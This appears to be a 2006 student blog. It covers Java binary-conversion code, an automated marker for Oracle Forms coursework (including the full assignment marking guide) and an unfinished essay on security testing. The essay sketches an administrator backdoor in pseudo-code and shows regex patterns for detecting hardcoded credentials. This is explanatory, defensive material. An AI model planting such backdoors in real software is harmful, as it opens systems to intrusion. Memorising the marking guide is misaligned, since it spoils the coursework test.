Tuesday, May 30, 2006

My First Software Release

RSS Podcaster

I took on a business-linked project with a marketing group to build podcaster software (in 2006). It used RSS, the newest technology at the time; I had never heard of it before, and even they had very little knowledge about it. I had also already been given 2 assignments before the class even started. They called these Hurdle Assignments. They are only worth 1%, but we need to get 100% of that 1% in order to pass the subject.
I may become a tutor for 2 subjects next semester.

At first, I was not confident about taking this. But I have promised myself never to reject any challenge that God has given me. So I had to take it with faith.

When I was looking for an IT job, I expected the company to teach me everything and give me everything. But what I got was totally different. I had to do everything myself (designing, coding and testing alone). They just gave me a lot of problems that seemed impossible for me to implement. But this is the rule: “the Customer is King”. That’s why I tried my best to do what he wanted for this project.

Finally this project is nearly finished and is due to be released next Monday. I cannot believe that I could actually build this kind of project alone, and faster than I imagined.
You can download it at


I cannot imagine if I had not taken this challenge; I would never have had such a great experience myself. I may even get a new award soon for building this project alone, because similar competing projects were built by at least 4-5 people with more experience than me, or even professors of IT.

My passion is to become an experienced programmer as soon as possible, no matter what, even while I am still studying. That’s why I want to take every challenge and opportunity that God has given me. And I will never again be afraid of a challenge. I believe that if I have done my best, God will do the rest.

BinHelp.java

/**
* Class that supports conversion between binary digits and numbers
* @author KURNIAWAN Kurniawan
* Student ID : 2791692
* Created : 13/03/2006
* Modified : 16/03/2006
*
*/

public class BinHelp
{

public static int bin2int(int[] biner,int start,int size)
{
int sum=0;
int ctr=start;
for (int i=0;i<size;i++)
{
sum+=biner[ctr] * (Math.pow(2,(size-1-i)));
ctr++;
}
return sum;
}

public static int[] int2bin(int dec, int bits)
{

int[] biner= new int[bits];

for (int i=0;i<bits;i++)
{
biner[i]= 0;
}
int i=0;
if (dec>0)
{
while(dec!=1)
{
biner[bits-1-i]= dec % 2;
dec=(int)dec/2;
i++;
}
//the last one
biner[bits-1-i]= dec;
}

return biner;
}
//this function is to convert binary to byte size
public static byte bin2byte(int[] biner,int start,int size)
{
return int2byte(bin2int(biner,start,size));
}
public static int[] byte2bin(byte dec,int size)
{
return int2bin(byte2int(dec),size);
}
public static int [] join(int [] a, int [] b)
{
int [] ints = new int[a.length + b.length];

System.arraycopy(a, 0, ints, 0, a.length);
System.arraycopy(b, 0, ints, a.length, b.length);

return ints;
}

public static int [] extract(int [] a,int start, int size)
{
int [] result= new int[size];
int ctr=start;
for (int i=0;i<size;i++)
{
result[i]=a[ctr];
ctr++;
}
return result;
}


public static int[] createIP(int octet1,int octet2,int octet3,int octet4)
{
int[][] ip= new int [4][8];
ip[0]=int2bin(octet1,8);
ip[1]=int2bin(octet2,8);
ip[2]=int2bin(octet3,8);
ip[3]=int2bin(octet4,8);

int[] result;
result= join(ip[0],ip[1]);
result= join(result,ip[2]);
result= join(result,ip[3]);
//printBin(result,32);
return result;

}

public static void printBin(int[] biner,int size)
{
for (int i=0;i<size;i++)
{
System.out.print(biner[i] + " ");
}
System.out.println();
}


public static void displayIP(int[] ip)
{
int[][] ipx= new int [4][8];
for (int i=0;i<4;i++)
{
ipx[i]=extract(ip,i*8,8);
System.out.print (bin2int(ipx[i],0,8) + " ");

}
System.out.println();
}

public static int byte2int(byte x){return (int)x+128;}//maps byte -128..127 to int 0..255
public static byte int2byte(int x){return (byte)(x-128);}//maps int 0..255 to byte -128..127


public static void main(String[] args)
{

System.out.println((byte)129); // (byte)129 overflows to -127
}
}
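A quick round-trip check of the conversion helpers. This is a self-contained sketch: the two methods are copied from the class above (with the loops repaired) so the example compiles on its own.

```java
public class BinHelpDemo {
    // Copy of BinHelp.int2bin from above: most-significant bit first.
    static int[] int2bin(int dec, int bits) {
        int[] biner = new int[bits];
        int i = 0;
        if (dec > 0) {
            while (dec != 1) {
                biner[bits - 1 - i] = dec % 2;
                dec = dec / 2;
                i++;
            }
            biner[bits - 1 - i] = dec; // the leading 1 bit
        }
        return biner;
    }

    // Copy of BinHelp.bin2int from above: sum of bit * 2^position.
    static int bin2int(int[] biner, int start, int size) {
        int sum = 0;
        for (int i = 0; i < size; i++) {
            sum += biner[start + i] * (int) Math.pow(2, size - 1 - i);
        }
        return sum;
    }

    public static void main(String[] args) {
        int[] bits = int2bin(172, 8); // 172 = 128 + 32 + 8 + 4
        StringBuilder sb = new StringBuilder();
        for (int b : bits) sb.append(b);
        System.out.println(sb);                  // prints 10101100
        System.out.println(bin2int(bits, 0, 8)); // prints 172
    }
}
```

The round trip (int → bits → int) is what createIP and displayIP rely on, one octet at a time.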

Marking Automation Tester

My Real Project
(Marking Automation Tester) by Kurniawan

I am a Database Management Systems tutor at Swinburne University this semester.
This week I have a lot of work: I have to mark the DMS assignments for the classes I tutor.
I got 80 programs (Oracle Forms) to test and score.

It was a busy day, so I wanted to find a way to build an automated tester to make my work easier. Thank God, I found one.

I was sitting in Software Testing Process Automation when the lecturer (Dr George Plackov) introduced a very interesting tool (Rational Robot). My plan was to create an automated tester to mark the 80 Oracle Forms using Rational Robot.

This automated tester will run each program, check it against the marking sheet, and enter the score through the Electronic Submission Processor (ESP)
https://esp.it.swin.edu.au/ .

So basically I just do one click for every form I get, and it does everything for me. Isn't that interesting?

This is the description of the requirement specification.

GENERAL DESCRIPTION
The aim of this assignment is to implement:
A. A stored procedure that performs a bank transaction on the Minibank database.
B. A Form that can be used by the teller to perform an over-the-counter bank transaction.

The Minibank Schema MBDDL.SQL with sample data MBDAT.SQL are supplied
MBCUSTOMER(cust_no, surname, name1, name2, address1, address2, state, postcode, birthdate)
MBACCOUNT(account_no, cust_no, account_type, int_rate , last_stmnt_date, balance, overdraft, holdflag)
MBTRAN(trans_no, trans_type, trans_amount, account_no, balance, trans_text, trans_date_time, trans_user)
TRANSNUMB_CONTROL(last_transnumb)
The table TRANSNUMB_CONTROL is used to generate unique key values for the MBTRANS table. TRANSNUMB_CONTROL should hold the next key value for a row to be inserted into MBTRANS, and is then incremented ready for the next transaction.



DETAILED SPECIFICATION
A. The stored procedure performs a bank transaction in accordance with the following business rules:
BR1. When a (Bank) transaction is performed on a customer’s account (eg. deposit or withdrawal transaction), a record is entered into the transaction log (MBTRANS) identified by a unique transaction number. The current time, date, teller identity as well as the account number, the new account balance and type of transaction are recorded.
BR2. A deposit (trans_type = ‘DEP’) credits the account balance by the transaction amount.
BR3. A withdrawal (trans_type = ‘WITH’) debits the account balance by the transaction amount.
BR4. If a withdrawal would take the balance below the credit limit (balance + overdraft < 0 ), the withdrawal is rejected.
BR5. No withdrawals are allowed on held accounts.
BR6. For any over-the-counter withdrawal (trans_text = ‘Over-the-counter’ AND trans_type = ‘WITH’), a bank charge of $3 is automatically levied on the account. The charge is debited from the account balance and logged separately as a transaction of type CHGS (trans_type = ‘CHGS’).
BR7. For any deposit or withdrawal (trans_type IN (‘WITH’,‘DEP’)) on a cheque account (account_type = ‘CHQ’), the government levies a tax at the rate of 0.1% of the deposit or withdrawal amount. The tax is debited from the account balance and logged separately as a transaction of type FID (trans_type = ‘FID’).
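To make the fee arithmetic in BR6 and BR7 concrete, here is a plain-Java sketch. This is my own illustration, not the assignment's PL/SQL: BR1's logging details and the BR4/BR5 checks are left out, and the `apply` helper and its signature are invented for the example.

```java
import java.util.ArrayList;
import java.util.List;

public class MinibankRules {

    // Apply one DEP/WITH transaction to a balance (BR2/BR3) and collect the
    // extra log entries the rules require: CHGS for over-the-counter
    // withdrawals (BR6) and FID tax on cheque accounts (BR7).
    static List<String> apply(double[] balance, String transType,
                              double amount, String accountType, String transText) {
        List<String> log = new ArrayList<>();
        if (transType.equals("DEP")) {
            balance[0] += amount;            // BR2: deposit credits the account
        } else if (transType.equals("WITH")) {
            balance[0] -= amount;            // BR3: withdrawal debits the account
        }
        log.add(transType);
        if (transType.equals("WITH") && transText.equals("Over-the-counter")) {
            balance[0] -= 3.0;               // BR6: $3 over-the-counter charge
            log.add("CHGS");
        }
        if (accountType.equals("CHQ")
                && (transType.equals("DEP") || transType.equals("WITH"))) {
            balance[0] -= amount * 0.001;    // BR7: 0.1% government tax (FID)
            log.add("FID");
        }
        return log;
    }

    public static void main(String[] args) {
        double[] bal = {2606.8};
        System.out.println(apply(bal, "DEP", 200, "CHQ", "Cheque Deposit"));
        System.out.printf("balance = %.1f%n", bal[0]);
    }
}
```

With a starting balance of 2606.8 (inferred from the expected rows in the marking guide below), the $200 cheque deposit goes +200 for the DEP and then -0.20 for the 0.1% FID tax, matching the 2806.8 and 2806.6 balances shown there.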

The stored procedure has the following specification:
CREATE OR REPLACE PROCEDURE addTrans(
new_trans_type MBTRANS.trans_type%TYPE,
new_trans_amount MBTRANS.trans_amount%TYPE,
new_account_no MBTRANS.account_no%TYPE,
new_trans_text MBTRANS.trans_text%TYPE,
new_trans_user MBTRANS.trans_user%TYPE)
The procedure should raise the following errors:
raise_application_error(-20001, ‘Account not found’);
raise_application_error(-20002, ‘Insufficient funds’);
raise_application_error(-20003, ‘Account held: No withdrawal allowed’);




Testing stored procedure
The stored procedure should be tested for the following scenarios:
Scenario                      Expected Outcome
Normal Deposit                Deposit transaction logged.
                              Account balance incremented by transaction amount.
                              Tax transaction logged.
Over-the-counter Withdrawal   Withdrawal transaction logged.
                              Account balance decremented by transaction amount.
                              Tax transaction logged.
                              Charges transaction logged.
Other Withdrawal              Withdrawal transaction logged.
                              Account balance decremented by transaction amount.
                              Tax transaction logged.
Non-existent account          ERROR ‘Account not found’
Insufficient funds            ERROR ‘Insufficient funds’
Account held                  ERROR ‘Account held’



B. Develop an Oracle form to be used by a teller at Minibank to perform over-the-counter bank transactions. The teller accepts applications from customers at the counter for deposits or withdrawals from any of the customer’s accounts except withdrawals from a cheque account. Cheque clearances are handled separately. The behaviour of the form during the user interaction phase is as follows:
1. When the teller loads the form, the current date and the identity of the teller are displayed.
2. The teller enters an account number either directly or by selecting a value from an LOV (pop up list) showing account_no, account_type and surname in surname sequence.
3. Upon entering a valid account number, the customer’s surname (surname) and first given name (name1), account type and available credit (credit) are displayed. Available credit is calculated as balance+overdraft. The user cannot directly modify the displayed values of surname, name1, account_type or credit on the form.
4. Only a single over-the-counter deposit or withdrawal transaction can be entered by this form; that is, purchase, interest, bank charge or tax transactions cannot be entered directly by this form. The user then enters either ‘DEP’ or ‘WITH’ for trans_type, except if the account type is ‘CHQ’ or the account is held, in which case trans_type displays ‘DEP’ and can only accept ‘DEP’.
5. The user then enters a positive value for the transaction amount (trans_amount). A deposit (DEP) increments the displayed available_credit by trans_amount. A withdrawal decrements the credit by trans_amount, as long as credit does not go below zero in which case the transaction amount is rejected. (See business rule 4 above.)
6. (OPTIONAL) If the user goes back and modifies trans_type, if trans_amount is not null, credit is recalculated and displayed.
7. If the user does not enter a value for trans_text, it defaults to ‘Over-the-counter’.
8. (OPTIONAL) If the user goes back and modifies account_no, then surname, name1, account_type and credit are re-evaluated and trans_type and trans_amount are set to null.
9. The form should also enforce all fixed-format database constraints that apply to data in the form.
10. The form cannot be used to directly query, update or delete any row in the database.

The appearance of the form should be

When the user presses SAVE, the form should commit a transaction on the Minibank database according to business rules BR1-7 above. These business rules must be preserved during the Post-and-commit Phase. Even though business rules 4 & 5 would have been validated during the user interaction phase, it is possible that they have been invalidated by other concurrent transactions. Such violations must be caught by your form and reported appropriately on the message line. This will be tested.
You should produce two different versions of the form, each with a different design for the post-and commit logic.
B1 This version should call the stored procedure from part A from the ON-INSERT trigger. Thus all business logic is implemented on the server. All exceptions raised by the stored procedure will be handled in the EXCEPTION section of the ON-INSERT trigger. (An example of this kind of architecture can be found as VERSION 3 in Lecture 5.) A skeleton for the ON-INSERT trigger is provided below.
B2 This version should implement all business logic in the PRE-INSERT trigger on the client. All exceptions will therefore be handled in the EXCEPTION section of this trigger. (An example of this kind of architecture can be found as VERSION 1 in Lecture 5.)
Only Oracle Form Builder features described in lectures may be used to develop this form.
Your form must behave correctly even when there are several transactions running concurrently. That is, transactions independently accepting valid changes during user interaction may fail after attempting to commit the changes. Hence you will need to lock records to prevent two or more users accessing the same record at the same time. It is therefore important for you to decide what SELECT statements should lock their result.
Your form must be portable. That is, it should run correctly from any Oracle account that has access to the MB database. To ensure this, you should run and test your form in a different account from the one in which it was developed.
Development Steps
1. Analyse Business rules. Determine whether each one is a verifier or an evaluator.
2. For the database transaction, determine what business rules need to be preserved by the transaction.
3. Determine what tables are primarily INSERTed into by the transaction. Make datablocks based on these tables for the form.
4. Based on the requirements of part B, carry out a design of your form for the user interaction phase. Use the notation for form objects and triggers from the lecture.
5. For each INSERT operation, draw a block diagram showing a PL/SQL program block with inner blocks that preserve verifiers and evaluators.
6. Code and test stored procedures.
7. Use the PL/SQL block design to design the behaviour of your form during the Post-and-Commit phase. Use the notation for triggers, procedures and tables from the lecture. Draw separate diagrams for each of Architecture B1 and Architecture B2.
8. Code and test.
Forms Advice
a. Make sure when compiling a form that you are connected to the DBMS. If not, errors will be generated even though the syntax and logic may be correct.
b. The order in which the cursor jumps from field to field is determined by the order in which those blocks and fields are listed in the object navigator. Oracle starts at the top and works its way down. To change the jumping order just change the order in the object navigator by selecting and dragging the fields to the appropriate position relative to the others. Also applies to blocks.
c. When creating a text item manually in the Navigator, the item will not be visible on the form unless it is placed on the canvas. Assign it to the canvas in the Property Palette. To change the properties of the item, double-click on it to get the Property Palette.
d. When creating a text item that does not correspond to a column in the current table, don’t forget to change the property Database item to NO in the Property Palette.
e. So that a user cannot change the value of an item, you can set the item properties so that it is a Display Item.
f. To disallow querying, deleting or updating of records, go into the properties of the block in the section Database and set to NO the properties “query allowed” , “update allowed” and “delete allowed”.
g. To run a Form, don’t forget to start OC4J instance.








MARKING GUIDE
MB Teller Form
This marking scheme assumes a datablock based on the MBTRAN table. Designs based on other tables are possible, but complex. Any student presenting an alternative design must pass the same behavioural tests. The functionality should be the same, but the triggers may be different. You need to look at any submission like this separately, but be tough.
Populate the database by running MBANKDAT2.sql from the SQL*Plus window.
Carry out inspection only if test is inconclusive.
Feature Test Inspection Mark
1. Form showing correct fields. Load the form MBTellerBa.FMB and observe. 1
2. Current date (non-input) displayed. Observe WHEN-CREATE-RECORD, PRE-FORM, -BLOCK or –RECORD 1
3. Current user (non-input) displayed. Observe 1
4. No query allowed. Attempt Enter Query. Property Palette. 1
5. account_no input, NOT NULL and validated, and LOV for held account. Attempt to leave field NULL.
Enter wrong account_no, manually.
Attempt to enter valid account_no by LOV. LOV 2
6. Customer name, Credit Account type (all non-input) populated. Enter account_no = 410100
Check Customer are populated.
POST-TEXT-ITEM or POST-CHANGE or WHEN-VALIDATE-ITEM on :account_no. 2
7. Customer name, Credit, Account type cannot be updated. Attempt to update any of :surname, :name1, :credit, :account_type fields. Property Palette 1
8. Trans_type input, NOT NULL and valid. Attempt to leave field NULL.
Enter wrong :trans_type.
Enter valid :trans_type = ‘WITH’. POST-TEXT-ITEM or POST-CHANGE or WHEN-VALIDATE-ITEM on :trans_type. 1
9. Withdrawal should give error. Should display message ‘Cannot withdraw from held account.’ OR WHEN-VALIDATE-RECORD 1
NEW FORM
10. Enter Trans_amount invalid for withdrawal. Should show appropriate error message. Enter account_no = 402000
Enter valid :trans_type = ‘WITH’.
Enter invalid :trans_amount = 5000.
Should display message ‘Insufficient funds.’ POST-TEXT-ITEM or POST-CHANGE or WHEN-VALIDATE-ITEM on :trans_amount and :trans_type. 1
11. Enter valid withdrawal Trans_amount. Credit (non-input) updated. Enter valid :trans_amount = 2000.
:credit = 2003 2
12. Comment (input) initialized. :trans_text = ‘Over-the-counter’
Attempt to change: ok. 1
END OF USER INTERACTION testing
13. Enter valid withdrawal, but before SAVE, another transaction reduces credit limit. Should produce appropriate error message. Enter account_no = 402000
Enter valid :trans_type = ‘WITH’
Enter valid :trans_amount = 2000.
DO NOT PRESS SAVE
In SQL*Plus window, reduce the credit available to account 402000, by running 2.sql script. Should succeed, if not, then lock in form taken too soon. Return to the form window and SAVE. Should fail with user-defined error message of insufficient credit. PRE-INSERT on :MBTRAN trigger for credit check. Re-read account balance with lock. Original credit must be reassigned based on new query.
PRE-INSERT on :MBTRAN 4
14. Enter valid withdrawal, but before SAVE, another transaction puts hold on the account. Should produce appropriate error message. Enter valid :trans_amount = 5.
DO NOT PRESS SAVE
In SQL*Plus window, put a hold on account 402000, by running 3.sql script. Should succeed, if not, then lock in form taken too soon. Return to the form window and SAVE. Should fail with user-defined error message of account on hold. 3
15. Successful cheque deposit:Trans number correctly assigned Enter account_no = 402100
Enter valid :trans_type = ‘DEP’
Enter valid :trans_amount = 200.
PRESS SAVE, Run 4.sql in SQL*Plus window:
TRANS_NO TRAN TRANS_AMOUNT ACCOUNT_NO BALANCE TRANS_TEXT
---------- ---- ------------ ---------- ---------- ----------------
5002 FID .2 402100 2806.6 Cheque Deposit
5000 DEP 200 402100 2806.8 Over-the-counter PRE-INSERT on :MBTRAN.
Transaction number generated
Date re-evaluated
Re-read balance & check credit
No hold check

PRE-INSERT or POST-INSERT on :MBTRAN.
Govt tax INSERT
Bank charge INSERT
If PRE-INSERT, database items should not be modified. 1
16. Transaction logged 1
17. Govt tax. 1
18. Account balance updated 1
19. Successful savings withdrawal:Trans number correctly assigned. New form
Enter account_no = 410011
Enter valid :trans_type = ‘WITH’
Enter valid :trans_amount = 100.
PRESS SAVE, Run 5.sql in SQL*Plus window:
TRANS_NO TRAN TRANS_AMOUNT ACCOUNT_NO BALANCE TRANS_TEXT
-------- ---- ------------ ---------- ---------- ----------------
5003 WITH 100 410011 12496.9 Over-the-counter
5004 CHGS 3 410011 12493.9 OtC Fee 1
20. Transaction logged 1
21. Bank charge 1
22. Account balance updated 1
23. No queries in user-interaction triggers should be locked Deduct marks if SQL*Plus transactions hang. user-interaction triggers 4
CODE INSPECTION
24. All queries in transactional triggers must be locked. PRE-INSERT trigger 2
25. Separate user-defined error messages. Separate error message texts for insufficient funds, held account, account not found. Look in POST-CHANGE etc on :trans_type & :trans_amount, PRE-INSERT & ON-ERROR. Should not combine error messages. 2
26. Trigger coding style Naming, indentation, program blocks, data declarations as local as possible. 2
27. Error message text Appropriate error message text. 3
28. Validation Trigger level (during user interaction) A constraint should be tested as early as possible, ie. the trigger timing should not be too late or level too high. A constraint should not be tested any more frequently than is necessary, ie. the trigger level should not be too low. Triggers should be used consistently, viz POST-TEXT-ITEM or POST-CHANGE or WHEN-VALIDATE-ITEM. 2
29. No redundant, nonfunctioning objects Such as blocks, items or triggers 3
30. No duplicate querying of the same row in user interaction phase. 3
31. Logic for separate business rules in separate subblocks. Except where functionality is common 2
32. No duplicate functionality in post-and commit phase. Repeating code to generate trans number 2
33. All error messages confined to EXCEPTION section of PRE-INSERT trigger Use EXCEPTION variables 2
34. No programmed INSERT of primary bank transaction in PRE-INSERT trigger 3
35. Quality of Comments Comments should use business language unless programming is unusually complex. All program blocks should be traceable to business rules by comments. 2
36. Quality of names Names in the form should be consistent with the DB. Other names should be meaningful in terms of the business. 2
RESTORE the DB (Run MBANKDAT2.sql) - CALLING Stored procedure 0
37. Form commits db transaction correctly with stored procedure. Run the form MBTellerBb.FMB with any successful transaction. No errors. 5
38. Calling stored procedure from ON-INSERT trigger Parameters should be correct 3
39. EXCEPTION section of ON-INSERT trigger 3
TOTAL 75


The ESP MARKING SHEET should be filled in automatically by Rational Robot




After it finishes filling in my marking sheet, I can check it manually before I submit the scores, by comparing the result with the reports from Rational Robot.
STEPS THAT I HAVE DONE


STEP 1. Prepare all of the things that need to be tested and run automatically.
There are 3 applications that should run automatically together:

1. The Form application that I want to test






2. SQL*Plus, to test locking and deadlock.


3. The ESP system, to input the marks



STEP 2. Open Rational Robot and start capturing the GUI.

Select from the ESP system which assignment needs to be checked.

Download the assignment


Save the file to C:/temp


Open the form and look at the code


Start Testing and Capture the Result


Update the Marking Sheet based on the testing



STEP 3. Change the scripts so they can loop automatically through all the buttons.

By using some basic iteration, I could generate a very powerful tool.
This is the code that was generated:



I can generate test data by using datapools.
Open Test Manager (from a Rational Robot script, follow Tools > Rational Test > Test Manager)


Open a datapool (Tools > Manage > Datapools)


I can generate 2000 test records to test the performance of Oracle.


After that I changed my script so it can generate the SQL (Structured Query Language) statements that can be input directly into iSQL*Plus.


'$Include "SQAUTIL.SBH"

Sub Main
Dim Result As Integer
Dim i As Integer
Dim givenName As String
Dim surname As String
Dim address As String
Dim phone As String
Dim mobile As String
Dim dp As Long

dp = SQADatapoolOpen("Customer")


'Initially Recorded: 29/04/2006 9:56:01 PM
'Script Name: test sql

Window SetContext, "Caption=iSQL*Plus Release 9.2.0.6.0 Production: Work Screen - Mozilla Firefox", ""


for i=1 to 200

call SQADatapoolFetch(dp)
call SQADatapoolValue(dp,1,givenName)
call SQADatapoolValue(dp,2,surname)
call SQADatapoolValue(dp,3,address)
call SQADatapoolValue(dp,4,phone)
call SQADatapoolValue(dp,5,mobile)

InputKeys "insert into customer values ('" & givenName & “…….. "{ENTER}"

GenericObject Click, "Class=MozillaWindowClass;ClassIndex=7", "Coords=37,392"
next i
call SQADatapoolClose(dp)
End Sub
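The generation step in the script above, one INSERT statement per datapool row, can also be sketched in plain Java. This is my own illustration: the `customer` column list is assumed, and the five fields mirror the datapool columns fetched in the script.

```java
import java.util.List;

public class InsertGenerator {

    // Build one SQL INSERT per datapool row, the way the SQABasic
    // script types them into iSQL*Plus.
    static String toInsert(List<String> row) {
        StringBuilder sb = new StringBuilder("insert into customer values (");
        for (int i = 0; i < row.size(); i++) {
            if (i > 0) sb.append(", ");
            sb.append("'").append(row.get(i)).append("'");
        }
        return sb.append(");").toString();
    }

    public static void main(String[] args) {
        // One hypothetical datapool row: given name, surname, address, phone, mobile.
        List<String> row = List.of("Kurniawan", "Kurniawan",
                "Hawthorn VIC", "9214 0000", "0400 000 000");
        System.out.println(toInsert(row));
    }
}
```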



And it will generate:




After that I just compare the results generated by Rational Robot with what I did manually.

Once I was confident that my automated tester would work properly, I left it alone for 4 hours of testing.

And finally, this subject really helped me a lot to get through my job and busy days.
I cannot imagine working without this tool.
Thanks to my beloved teacher (Dr George Plackov)








THE WEAKNESSES OF RATIONAL ROBOT

• Rational Robot consumes a lot of memory and CPU!
I tested my application using Rational Robot at the Swinburne Burwood lab (SB103), on machines with 256 MB DDR-400 RAM and a Pentium 4 1.8 GHz. It took around 6 hours to capture my testing process. It is easy to capture a small application like the lab material (using Access), but when I tried Oracle Forms, SQL*Plus and Firefox as the browser, capturing took very long. I had to wait 5-10 minutes to capture 1 functional test. It is very slow!!!

• Rational Robot does not release unused memory
It holds on to memory every time it finishes. As a result I had to restart my computer after each captured functional test; otherwise my computer would hang.

• Rational Robot contains some bugs
I found some bugs. Some functions cannot be captured, especially when I want to capture an LOV (List of Values) in an Oracle form. It always hangs, even when I restart many times.

• Rational Robot has no recovery state
If my computer hangs while I am capturing and I have to restart Windows, my captured test is GONE!

• Rational Robot consumes a lot of hard disk space
One captured functional test consumes 20-30 MB. Imagine if you have 1000 functional tests: how much disk capacity would you need to supply for Rational Robot?

Finally, because of these weaknesses, it took more than 10 hours just to generate the automated marker. Hopefully it would take less time with more memory and a faster CPU.

Software Testing VS SQL INJECTION

Abstract

Software application security is more than configuring a firewall or using long passwords with numbers in them. Software applications are made up of software modules or components and in the context of the Internet, these modules are highly visible. There are many opportunities for the hacker.

All students of Information Technology (IT) who write programs have it drummed into them to compartmentalise code into modules. Compartmentalisation is a core foundation of the Object Oriented philosophy and arguably good programming practice for any software design paradigm. With large to mid-size projects, software developers use concepts of code re-use and code off-the-shelf, so software modules may not necessarily have been written by the developers of the whole application. “Building secure software is very different from learning how to securely configure a firewall. It must be baked into the software, and not painted on afterwards” [Curphey 04]. Module-level security is at the heart of application security. What security risks lie in wait within these modules, and how do we test for them? This document discusses the role of software testing in a security-oriented software development process.

Software security is not a black and white field. Business Owners want to pay for a simple silver security bullet, by following a security guideline or framework: “do it this way, or follow this checklist, and you’ll be safe.” The black and white mindset is invariably wrong. Some security testing concepts, Penetration Testing and Black Box Testing, only reveal the security issues that have been tested for. Other techniques, Code Inspection and White Box Testing, take time and money. At a technical level, security test activities are carried out to validate that the system conforms to the security requirements, thereby identifying potential security vulnerabilities. At a business level, these tests are conducted to protect reputation and brand, reduce litigation expenses, or conform to regulatory requirements.

Absolute security is a myth. How closely we approach this myth is limited by the Business Owner's requirements. The Business Owner ultimately defines security by weighing cost and time against risk. A very secure and safe billion-dollar application, five years too late, is worthless.

The solution is multifaceted and wide: from a top level review of the Software Development Life Cycle (SDLC) process itself; to a low level re-examination of coding philosophies and algorithms.




Introduction

Over the decades, our need to secure software has grown with the evolution of business software systems, from systems accessible by a manageable handful of insiders to today's web-based forms, accessible by millions of people.

Along the way, our forty-year initiation into the discipline of Information Technology (IT) has introduced new security challenges. In the early days, perhaps, the top-down trust of business owners in their IT workers was a fair gamble, and software security may have been a minor or non-existent paragraph in those early software specifications. Modern business owners, however, demand security. Every user is a potential threat.

Albeit, security does have a long history in IT, going back to the origins of peer-to-peer networks in the 1960s. But, as a discipline, the study of computer security wasn't forged until the early 1970s, and was largely focused on log files [Anderson 72]. With greater reliance on IT and the emergence of the Internet, the necessity for security has grown; the monitoring of log files is no longer enough. In the early 1990s, IT mainly meant LANs for medium to small businesses; for large businesses it was WANs and the Internet. Organisational risk management (in the 1990s) mainly consisted of tape backups of data; large institutions such as banks could afford backup mainframes such as the IBM 3090.

IT has evolved and become more complex, and there are other alternatives available to organisations today: disaster recovery setups, clustering of servers and networks, and greater bandwidth to mirror backups to off-site systems, just to name a few. While more packaged software solutions have entered the market, this does not mean that organisations have greatly changed their methodology for IT risk management. Information and systems security is critical to organisational survival. The Melissa and I Love You viruses were released into the wild in 1999 and 2000 respectively, and the Chernobyl virus caused tens of millions of dollars of damage to business, all well before the 2001 terror attacks on the US [Zammit 04].


Security vulnerabilities are a type of software bug. It is commonly accepted that software bugs exposed earlier in the development process are much cheaper to fix than those discovered late in the process. Arguably, security vulnerabilities have a greater financial impact on the Business Owner than traditional software bugs. Security bugs can cause damage to reputation, brand, goodwill and result in liability and legal issues.
















(Fig 1)

The benefits linked with traditional testing philosophies are also realized throughout the software development life cycle with security testing. IT security is its own field and is here to stay [Goasduff 04], and it is likely to continue evolving. For example, the Secure Socket Layer (SSL) protocol is a leading on-line technology which, blended with Extensible Markup Language (XML), makes an almost standard encryption and security system for sharing critical information. This technology protects the integrity of data or information while in transit; however, the environment it is going to, or coming from, may not be secure [Orgall 04].

The solution to software security will never be absolute: no cure can be found for a disease unknown. “A security test is simply a point in time view ... a defensive posture and (the security testers) present the output from their tests as a security snapshot. They call it a snapshot because at that time the known vulnerabilities, the known weaknesses. Is this snapshot enough?” [osstmm1]

Levels of Security

Level One Security – Securing the Network. Hardware/software hybrid solutions have been invented to secure systems: routers, firewalls and proxy servers police the network, applying the business security rules about ports, protocols and addresses, using abstractions such as virtual networks, intranet versus Internet, trusted sites and the like.

Level Two Security – Securing the Host. Software applications are hosted on servers, and one host may host multiple business systems. Operating system authentication methodologies are used to police who gets into the host and what access rights the user has. Concepts of superuser, administrator, user, groups and roles have been created with varying access privileges to operating system and hosted software entities.

Level Three Security – Securing the Application. Since the host may host multiple applications, host-based user rights normally do not map to application user rights, so business system software also has its own security regime. For example, a database application such as Oracle has another layer of system and user entities similar to the host-based users. And even though the user running the application has unrestricted access to the local file system, code permissions may restrict the application to read-only access, and only within a specific directory.

Level Four Security – Securing the Module. Software applications are made up of software modules; the sum of the modules is the whole application. Modern software development includes concepts of code re-use and code off the shelf, not necessarily built by the developers of the whole. Often it is the smallest details that lead to the biggest security threats: an accumulation of small issues, which individually may not represent much risk, may lead to a security breach when aggregated. Many organizations utilize the processing capabilities of third-party partners, who more than likely have security policies that differ from their own.

(Fig 2)






Software security is not keeping pace as advances are made elsewhere. Despite new technical standards, the application security problem is getting worse. According to research by the National Institute of Standards and Technology (NIST), 92% of all security vulnerabilities are now considered application vulnerabilities rather than network vulnerabilities.

(Fig 3)

Module security

A module comprises one or more components that achieve a business function [applabs1]. It encapsulates and aggregates the functionality of its components and appears as a black box to its users. We must therefore consider a security code review of applications. Security code inspections go a step further than automated scanning by attempting to find design and architectural flaws as well as language-specific implementation bugs. Testing has shown that the current crop of web application scanners find fewer than 20% of the vulnerabilities in a common web site, which leaves about 80% in production code for the hackers to find and exploit [Curphey 04] [Curphey 06].

Module security is at the heart of application security. A web page, in any incarnation, is essentially a software module, and web pages are the most visible interface of any Internet-hosted application. Even a non-programmer using their Internet browser to view source may be able to detect that a flaw exists, for example:


if input from browser = “the special 40 characters” then log user in as administrator
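A flaw of this kind often survives as a hardcoded comparison in code or page source. As a minimal illustration (the patterns and the sample page below are hypothetical, and the pattern list is far from exhaustive), a reviewer might scan source text for such giveaways:

```python
import re

# Patterns that often indicate a hardcoded backdoor or credential
# (illustrative only, not a complete rule set).
SUSPICIOUS = [
    re.compile(r"password\s*==?\s*[\"'][^\"']+[\"']", re.IGNORECASE),
    re.compile(r"admin\s*=\s*(true|1)\b", re.IGNORECASE),
]

def scan_source(text: str) -> list[str]:
    """Return the lines of `text` that match a suspicious pattern."""
    hits = []
    for line in text.splitlines():
        if any(p.search(line) for p in SUSPICIOUS):
            hits.append(line.strip())
    return hits

page = ('<input type="hidden" name="isAdmin" value="0">\n'
        'if (password == "s3cret40charstring") { grantAdmin(); }')
print(scan_source(page))
```

A scan like this finds only the crudest cases, but as the text notes, even a crude look at client-visible source can reveal a flaw.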


Security Testing

We can use a variety of testing techniques specifically to probe security. There are two major aspects of security testing: Functional Testing, which tests that it works (or indeed that it doesn’t work), and Risk Based Testing, which tests the subsystem in light of malicious attack. Security testing is motivated by probing undocumented assumptions and areas of particular complexity to determine how a program can be broken [Howard 02].

Functional Testing

